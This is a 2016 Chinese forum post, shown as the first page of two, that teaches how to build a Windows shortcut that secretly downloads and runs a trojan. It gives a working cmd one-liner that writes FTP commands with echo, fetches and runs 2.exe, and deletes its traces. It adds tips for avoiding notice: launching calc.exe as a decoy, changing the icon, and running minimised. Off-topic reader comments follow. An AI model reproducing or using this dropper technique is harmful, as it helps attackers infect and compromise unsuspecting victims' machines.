技术控

    今日:7| 主题:49136
收藏本版 (1)
最新软件应用技术尽在掌握

[其他] Windows小工具:LnkDown快捷方式加载Payload

[复制链接]
伪娘 发表于 2016-10-6 06:40:38
172 6

立即注册CoLaBug.com会员,免费获得投稿人的专业资料,享用更多功能,玩转个人品牌!

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
前言

  投稿一次,被小编退了,原因是不够扯。我就是小学没毕业的小学生,你让我扯,我去哪跟你扯的天花乱坠啊,使出洪荒之力我就再扯一次吧。还是要感谢下FREEBUF上次的小礼物,灰常喜欢。
  之前看到一款俄罗斯黑阔写的的快捷方式下载木马并运行的生成工具(Shortcut Downloader),调用PowerShell创建快捷方式实现下载恶意文件并运行,要知道PowerShell在03之前是没有默认安装的,也就是说在默认未装载的PC上就然并卵了。
  

Windows小工具:LnkDown快捷方式加载Payload-1 (Windows,俄罗斯,下载文件,播放器,下一步)

  快捷方式木马并非神马新鲜玩意,但大多集中于流氓网页,正常程序快捷方式遭到恶意文件替换(本来打开的QQ想撩妹,结果弹出苍老师的播放器),如何利用快捷方式(不调用PowerShell的情况下实现)实现下载某个文件并运行呢?聪明的你想到cmd多命令执行了吗?whoami&&netuser??至于下载文件,既然可以cmd多命令执行了,当然可以利用ftp下载文件了,有了思路就动手吧!
  基本思路

  逻辑

  1. Echo写出ftp信息,使用ftp –s:x 参数运行下载命令
  2. 语句使用&&链接,语句被执行才会继续下一步操作
  3. 最后执行恶意程序时使用if exist判断恶意程序是否下载,如果下载则执行
  


Windows小工具:LnkDown快捷方式加载Payload-2 (Windows,俄罗斯,下载文件,播放器,下一步)

  思路验证

  [code]echo open127.0.0.1>f&&echo 123>>f&&echo321>>f&&echo get 2.exe>>f&&echobye>>f&&ftp -s:f&&del /q f&&if exist 2.exe start2.exe[/code]  CMD下运行正常,但写到快捷方式,显然需要修改一下,首先必须加入/c执行,否则会卡出黑屏不退出(这么不尊重被攻击者,脑子是不是被踢了),在下载前运行一个正常的程序,免的被发现,例如calc.exe&&下载运行命令,然后你总得更改下图标吧大哥,其次既然是在后台静默下载运行,我们当然不想快捷方式一闪而过,创建完快捷方式右键修改运行方式最小化,OK一个简单lnk下载者就成了。
  

12下一页
友荐云推荐




上一篇:Working with Data: Services vs. Nav Params
下一篇:FastPOS Updates in Time for the Retail Sale Season
酷辣虫提示酷辣虫禁止发表任何与中华人民共和国法律有抵触的内容!所有内容由用户发布,并不代表酷辣虫的观点,酷辣虫无法对用户发布内容真实性提供任何的保证,请自行验证并承担风险与后果。如您有版权、违规等问题,请通过"联系我们"或"违规举报"告知我们处理。

崔菁 发表于 2016-10-6 11:25:51
不明觉厉,先回再看!
回复 支持 反对

使用道具 举报

yxlamkiv 发表于 2016-11-16 13:16:08
永远不要给背叛过自己的朋友第二次背叛的机会。
回复 支持 反对

使用道具 举报

空心印 发表于 2016-11-16 17:22:49
前排支持下!
回复 支持 反对

使用道具 举报

一菇凉心凉 发表于 2016-11-16 19:00:57
男人嘴巴眯眯甜心都一把苣苣莲!
回复 支持 反对

使用道具 举报

阳光透过窗台 发表于 2016-11-19 20:25:27
大声告诉我这是几楼?
回复 支持 反对

使用道具 举报

邓李 发表于 2016-11-20 17:53:07
今日头条 伪娘被曝
回复 支持 反对

使用道具 举报

*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

我要投稿

推荐阅读

扫码访问 @iTTTTT瑞翔 的微博
回页顶回复上一篇下一篇回列表手机版
手机版/CoLaBug.com ( 粤ICP备05003221号 | 文网文[2010]257号 )|网站地图 酷辣虫

© 2001-2016 Comsenz Inc. Design: Dean. DiscuzFans.

返回顶部 返回列表